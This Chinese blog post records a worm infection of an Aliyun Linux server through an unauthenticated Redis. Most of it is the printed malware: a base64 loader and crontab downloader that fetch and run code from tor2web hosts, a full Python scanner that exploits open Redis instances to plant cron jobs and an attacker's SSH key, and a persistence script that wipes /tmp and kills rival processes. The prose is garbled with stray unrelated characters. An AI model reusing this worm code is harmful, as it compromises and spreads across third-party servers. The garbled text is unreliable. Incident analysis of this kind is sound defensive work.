一個阿里云 linux服務(wù)器被植入病毒的記錄

update: 沒想到一個我記錄下的備忘會有朋友關(guān)注，那就更新一下。

? ? ? ? ? ? 1. 有人說代碼顯示不佳仆救，我后來了解了下抒和，需要新文章開始用Markdown設(shè)置，現(xiàn)在改不了了彤蔽。

? ? ? ? ? ? 2. 文末補(bǔ)充了綜合網(wǎng)上各處的清理腳本摧莽，僅供參考，實測還是有感染較深機(jī)器不能完全清除顿痪。

最近在我們的阿里云服務(wù)器(centos linux)上遇到一個病毒镊辕，是因為裝個新系統(tǒng)，Redis沒設(shè)密碼蚁袭，攻進(jìn)來的征懈，應(yīng)該是個蠕蟲代碼】模看了下卖哎，這shell腳本代碼寫的挺好的，貼在這里删性，學(xué)習(xí)一下亏娜。

先是阿里云報警，說在對外攻擊：

尊敬的xxxx蹬挺，您的云服務(wù)器（xxxx）由于被檢測到對外攻擊照藻，已阻斷該服務(wù)器對其它服務(wù)器端口（TCP:6379）的訪問，阻斷預(yù)計將在2019-05-21 19:04:50時間內(nèi)結(jié)束汗侵，請及時進(jìn)行安全自查。若有疑問群发，請工單或電話聯(lián)系阿里云售后晰韵。?

感謝您對阿里云的支持。

【阿里云】尊敬的 xxx：您有服務(wù)器因攻擊被限制訪問部分目的端口熟妓，詳細(xì)信息請看https://c.tb.cn/I3.vWxO?

登錄進(jìn)來看進(jìn)程雪猪，多了幾個可疑的進(jìn)程：

```

curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ud

wget --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm -O /etc/cron.daily/cronlog

?/usr/sbin/ntpd -u ntp:ntp -g

?/bin/sh /root/.cache/.ntp -n

curl -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.tor2web.su/images/ico/r64x75.ico -o /root/.cache/.favicon.ico

python2 -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IGJhc2U2NAppbXBvcnQgdXJsbGliMgppbXBvcnQgc3Ns

CkhPU1Q9Imh0dHBzOi8vYW43a21kMndwNHhvN2hwciIKUlBBVEgxPSJzcmMvc2MiCmQxPUhPU1QrIi50b3Iyd2ViLnN1LyIrUlBBVEgxCmQzPUhPU1QrIi5vbmlvbi5zaC8iK1JQQVRIMQpkMj1IT1NUKyIudG9yMndlYi5p

by8iK1JQQVRIMQpkZWYgbGQodXJsLCB0KToKICAgIHRyeToKICAgICAgICBjdHggPSBzc2wuY3JlYXRlX2RlZmF1bHRfY29udGV4dCgpCiAgICAgICAgY3R4LmNoZWNrX2hvc3RuYW1lID0gRmFsc2UKICAgICAgICBjdHgu

dmVyaWZ5X21vZGUgPSBzc2wuQ0VSVF9OT05FCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGN0eD1GYWxzZQogICAgaWYgY3R4OgogICAgICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9w

ZW4odXJsLHRpbWVvdXQ9dCxjb250ZXh0PWN0eCkucmVhZCgpKQogICAgZWxzZToKICAgICAgICAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliMi51cmxvcGVuKHVybCx0aW1lb3V0PXQpLnJlYWQoKSkKICAgIHJl

dHVybiBwYWdlCnRyeToKICAgIHRyeToKICAgICAgICBwYWdlPWxkKGQxLCA0MSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhZ2U9bGQoZDIsIDQxKQogICAgICAgIGV4ZWMo

cGFnZSkKZXhjZXB0IEV4Y2VwdGlvbjoKICAgIHBhZ2U9bGQoZDMsIDQxKQogICAgZXhlYyhwYWdlKQogICAgcGFzcw=='))

```

上面那段解碼過來代碼是這個 python寫的：

~~~python
```python

#coding: utf-8

import base64

import urllib2

import ssl

HOST="https://an7kmd2wp4xo7hpr"

RPATH1="src/sc"

d1=HOST+".tor2web.su/"+RPATH1

d3=HOST+".onion.sh/"+RPATH1

d2=HOST+".tor2web.io/"+RPATH1

def ld(url, t):

? ? try:

? ? ? ? ctx = ssl.create_default_context()

? ? ? ? ctx.check_hostname = False

? ? ? ? ctx.verify_mode = ssl.CERT_NONE

? ? except Exception:

? ? ? ? ctx=False

? ? if ctx:

? ? ? ? ? page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())

? ? else:

? ? ? ? ? page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())

? ? return page

try:

? ? try:

? ? ? ? page=ld(d1, 41)

? ? ? ? exec(page)

? ? except Exception:

? ? ? ? page=ld(d2, 41)

? ? ? ? exec(page)

except Exception:

? ? page=ld(d3, 41)

? ? exec(page)

? ? pass

```
~~~

主要作用是拉遠(yuǎn)程代碼，幾個服務(wù)器輪流備用起愈。

然后服務(wù)器上會多幾個文件只恨，文件位置還會變

/usr/local/bin/npt

/usr/local/bin/nptd

/usr/sbin/npt

/usr/sbin/nptd

~/.cache/npt

~/.cache/.a

~/.cache/.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf

kill-9 這些進(jìn)程，殺死后會重啟抬虽，crontab和sshkey文件即使root下也刪不掉官觅，網(wǎng)上查了下，

是利用了 linux文件不可變屬性i標(biāo)志阐污，lsattr命令看文件和其目錄的i標(biāo)記休涤，chattr清除

但清除后又會被加上。原因請看后面的代碼。

在定時任務(wù)里看

crontab -l

*/17 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;? ${curl}? -fsSLk --connect-timeout 26 --max-time 75? https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}? -fsSLk --connect-timeout 26 --max-time 75? https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}? -fsSLk --connect-timeout 26 --max-time 75? https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}? --quiet --no-check-certificate --connect-timeout=26 --timeout=75? https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}? --quiet --no-check-certificate --connect-timeout=26 --timeout=75? https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}? --quiet --no-check-certificate --connect-timeout=26 --timeout=75? https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

格式化下：

```

(tbin=$(command -v passwd);

bpath=$(dirname "${tbin}");

? curl="curl";

? if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];

? then

? ? ? curl="echo";

? ? ? if [ "${bpath}" != "" ];

? ? ? then

? ? ? ? for f in ${bpath}*;

? ? ? ? do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break;

? ? ? ? done;

? ? ? fi;

? fi;

? wget="wget";

? if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];

? then

? ? ? wget="echo";

? ? ? if [ "${bpath}" != "" ];

? ? ? then

? ? ? ? for f in ${bpath}*;

? ? ? ? do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break;

? ? ? ? done;

? ? ? fi;

? fi;

? if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ];

? then

? ? ? echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;

? fi;?

? ${curl}? -fsSLk --connect-timeout 26 --max-time 75? https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt

? ||${curl}? -fsSLk --connect-timeout 26 --max-time 75? https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt

? ||${curl}? -fsSLk --connect-timeout 26 --max-time 75? https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt

? ||${wget}? --quiet --no-check-certificate --connect-timeout=26 --timeout=75? https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt

? ||${wget}? --quiet --no-check-certificate --connect-timeout=26 --timeout=75? https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt

? ||${wget}? --quiet --no-check-certificate --connect-timeout=26 --timeout=75? https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt)

? && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

```

#! /usr/bin/env python

#coding: utf-8

import threading

import socket

from re import findall

import httplib

import os

from random import randrange

import random

import string

IP_LIST = []

debug=0

class scanner(threading.Thread):

? ? tlist = []

? ? maxthreads = 100

? ? evnt = threading.Event()

? ? lck = threading.Lock()

? ? def __init__(self,host):

? ? ? ? threading.Thread.__init__(self)

? ? ? ? self.host = host

? ? def run(self):

? ? ? ? RHOST='https://an7kmd2wp4xo7hpr'

? ? ? ? TOR1='.tor2web.su/'

? ? ? ? TOR3='.onion.sh/'

? ? ? ? TOR2='.tor2web.io/'

? ? ? ? CHKCURL='tbin=$(command -v passwd); bpath=$(dirname \\"${tbin}\\"); curl=\\"curl\\"; if [ $(curl --version 2>/dev/null|grep \\"curl \\"|wc -l) -eq 0 ]; then curl=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"CURLOPT_VERBOSE\\" && curl=\\"$f\\" && break; done; fi; fi; wget=\\"wget\\"; if [ $(wget --version 2>/dev/null|grep \\"wgetrc \\"|wc -l) -eq 0 ]; then wget=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"to <bug-wget@gnu.org>\\" && wget=\\"$f\\" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i \\".onion.\\"|wc -l) -ne 0 ]; then echo \\"127.0.0.1 localhost\\" > /etc/hosts >/dev/null 2>&1; fi; '

? ? ? ? RPATH1='src/ldm'

? ? ? ? TIMEOUT='40'

? ? ? ? COPTS='-fsSLk --max-time '+TIMEOUT

? ? ? ? WOPTS='--quiet --no-check-certificate --timeout='+TIMEOUT

? ? ? ? C1='\\n\\n*/1 * * * * root ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'

? ? ? ? C2='\\n\\n*/1 * * * * ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'

? ? ? ? SKEY="\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost\\n#"

? ? ? ? try:

? ? ? ? ? ? s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

? ? ? ? ? ? s2.settimeout(3)

? ? ? ? ? ? x = s2.connect_ex((self.host, 6379))

? ? ? ? ? ? if x == 0:

? ? ? ? ? ? ? ? DFDIR=DFRDB='N/A'

? ? ? ? ? ? ? ? stt1=stt2=stt3=stt4=stt5=-9

? ? ? ? ? ? ? ? tmp=rd(s2, 'config get dir\r\n')

? ? ? ? ? ? ? ? if "Authentication required" in str(tmp): stt1=-10

? ? ? ? ? ? ? ? elif "-ERR unknown command" not in str(tmp):

? ? ? ? ? ? ? ? ? ? if 'dir' in str(tmp): DFDIR=(tmp.split('dir'))[1].splitlines()[2]

? ? ? ? ? ? ? ? ? ? tmp=rd(s2, 'config get dbfilename\r\n')

? ? ? ? ? ? ? ? ? ? if 'dbfilename' in str(tmp): DFRDB=(tmp.split('dbfilename'))[1].splitlines()[2]

? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dbfilename root\r\n')

? ? ? ? ? ? ? ? ? ? if "+OK" in str(rs):

? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set rdbcompression no\r\n')

? ? ? ? ? ? ? ? ? ? ? ? if "+OK" in str(rs):

? ? ? ? ? ? ? ? ? ? ? ? ? ? write=rd(s2, 'flushall\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? if "write against a read only" in str(write):

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rd(s2, 'SLAVEOF NO ONE\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? write=rd(s2, 'flushall\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? if "write against a read only" not in str(write):

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? K1=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? K2=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? K3=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? CF=''.join(random.choice(string.lowercase) for x in range(random.randint(6, 18)))

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set stop-writes-on-bgsave-error no\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? #rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'set '+K2+' "'+C2+'"\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? apt=chkdir(s2, '/usr/share/bug/apt/')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? if apt == -4:

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? fml='N.'

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? stt1=chkdir(s2, '/var/spool/cron')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? else:

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? fml='Debian.'

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? stt1=chkdir(s2, '/var/spool/cron/crontabs')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? pine=chkdir(s2, '/etc/crontabs')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'del '+K2+'\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dbfilename .'+CF+'\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? stt2=chkdir(s2, '/etc/cron.d')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dbfilename crontab\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? stt22=chkdir(s2, '/etc')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? if stt2 < 2: stt2=stt22

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'del '+K1+'\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dbfilename authorized_keys\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'set '+K3+' "'+SKEY+'"\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? stt3=chkdir(s2, '/root/.ssh')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? stt4=chkdir(s2, '/home/ubuntu/.ssh')

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? #time.sleep(1)

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'del '+K3+'\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set rdbcompression yes\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set stop-writes-on-bgsave-error yes\r\n')

? ? ? ? ? ? ? ? ? ? ? ? if "cron" not in str(DFDIR) and ".ssh" not in str(DFDIR):

? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dir '+DFDIR+'\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dbfilename '+DFRDB+'\r\n')

? ? ? ? ? ? ? ? ? ? ? ? else:

? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dir /var/lib/redis\r\n')

? ? ? ? ? ? ? ? ? ? ? ? ? ? rs=rd(s2, 'config set dbfilename dump.rdb\r\n')

? ? ? ? ? ? s2.close()

? ? ? ? except Exception:

? ? ? ? ? ? pass

? ? ? ? scanner.lck.acquire()

? ? ? ? scanner.tlist.remove(self)

? ? ? ? if len(scanner.tlist) < scanner.maxthreads:

? ? ? ? ? ? scanner.evnt.set()

? ? ? ? ? ? scanner.evnt.clear()

? ? ? ? scanner.lck.release()

? ? def newthread(host):

? ? ? ? scanner.lck.acquire()

? ? ? ? sc = scanner(host)

? ? ? ? scanner.tlist.append(sc)

? ? ? ? scanner.lck.release()

? ? ? ? sc.start()

? ? newthread = staticmethod(newthread)

def get_ip_list():

? ? try:

? ? ? ? url = 'ifconfig.co/ip'

? ? ? ? conn = httplib.HTTPConnection(url, port=80, timeout=10)

? ? ? ? conn.request(method='GET', url='/', )

? ? ? ? result = conn.getresponse()

? ? ? ? ip1 = result.read()

? ? ? ? ips1 = findall(r'\d+.\d+.', ip1)[0]

? ? ? ? for u in range(0, 256):

? ? ? ? ? ? ip_list1 = (ips1 + (str(u)))

? ? ? ? ? ? for g in range(1, 256):

? ? ? ? ? ? ? ? IP_LIST.append(ip_list1 + '.' + (str(g)))

? ? except Exception:

? ? ? ? ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()

? ? ? ? ips2 = findall(r'\d+.\d+.', ip2)[0]

? ? ? ? for i in range(0, 255):

? ? ? ? ? ? ip_list2 = (ips2 + (str(i)))

? ? ? ? ? ? for g in range(1, 255):

? ? ? ? ? ? ? ? IP_LIST.append(ip_list2 + '.' + (str(g)))

? ? ? ? pass

def get_ip_list2():

? ? not_valid = [10,127,169,172,192]

? ? for i in range(0, 100000):

? ? ? ? first = randrange(1,227)

? ? ? ? while first in not_valid:

? ? ? ? ? ? first = randrange(1,227)

? ? ? ? ip = ".".join([str(first),str(randrange(0,256)),

? ? ? ? str(randrange(0,256)),str(randrange(0,256))])

? ? ? ? IP_LIST.append(ip)

def runPortscan():

? ? for x in range(99999):

? ? ? ? get_ip_list2()

? ? ? ? for host in IP_LIST:

? ? ? ? ? ? scanner.lck.acquire()

? ? ? ? ? ? if len(scanner.tlist) >= scanner.maxthreads:

? ? ? ? ? ? ? ? scanner.lck.release()

? ? ? ? ? ? ? ? scanner.evnt.wait()

? ? ? ? ? ? else:

? ? ? ? ? ? ? ? scanner.lck.release()

? ? ? ? ? ? scanner.newthread(host)

? ? ? ? for t in scanner.tlist:

? ? ? ? ? ? t.join()

def rd(sock, packet):

? ? try:

? ? ? ? sock.send(packet)

? ? ? ? reply = sock.recv(1024)

? ? ? ? if not reply: pass

? ? ? ? if '*' not in reply and '$' not in reply and '+' not in reply and ':' not in reply and debug >= 2: print(reply)

? ? ? ? return reply

? ? except:

? ? ? ? pass

def chkdir(sock, dir):

? ? stt=0

? ? rs=rd(sock, 'config set dir '+dir+'\r\n')

? ? if "+OK" in str(rs):

? ? ? ? stt=1

? ? ? ? rs=rd(sock, 'save\r\n')

? ? ? ? if "+OK" in str(rs):

? ? ? ? ? ? stt=2

? ? elif "o such file or " in str(rs): stt=-4

? ? return stt

if __name__ == "__main__":

? ? try:

? ? ? ? runPortscan()

? ? except KeyboardInterrupt:

? ? ? ? try:

? ? ? ? ? ? exit(0)

? ? ? ? except SystemExit:

? ? ? ? ? ? os._exit(0)

```

從里面看到有拉其遠(yuǎn)端代碼功氨，

https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm

base64解碼后代碼這樣：

```

#!/bin/sh

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

RHOST="https://an7kmd2wp4xo7hpr"

TOR1=".tor2web.su/"

TOR2=".tor2web.io/"

TOR3=".onion.sh/"

RPATH1='src/ldm'

#LPATH="${HOME-/tmp}/.cache/"

TIMEOUT="75"

CTIMEOUT="22"

COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "

WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "

tbin=$(command -v passwd); bpath=$(dirname "${tbin}")

curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi

wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi

#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '

CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '

LBIN8="kthrotlds"

null=' >/dev/null 2>&1'

sudoer=1

sudo=''

if [ "$(whoami)" != "root" ]; then

? ? sudo="sudo "

? ? timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; }

if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ]; then

? ? ${sudo} chmod +x "$0"

? ? nohup ${sudo} "$0" -n >/dev/null 2>&1 &

? ? echo 'Sent!'

? ? exit $?

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi

touch "/tmp/.${rand}" >/dev/null 2>&1 && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1

touch "/usr/local/bin/.${rand}" >/dev/null 2>&1 && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1

touch "${HOME}/.${rand}" >/dev/null 2>&1 && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1

mkdir -p ${LPATH} >/dev/null 2>&1

${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1

C1="*/9 * * * * (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"

C2="*/11 * * * * root (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"

skey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"

if [ "$(whoami)" != "root" ]; then sshdir="/${HOME}/.ssh"; else sshdir='/root/.ssh'; fi

${sudo} rm -f /tmp/* >/dev/null 2>&1

${sudo} rm -f /tmp/.* >/dev/null 2>&1

${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done

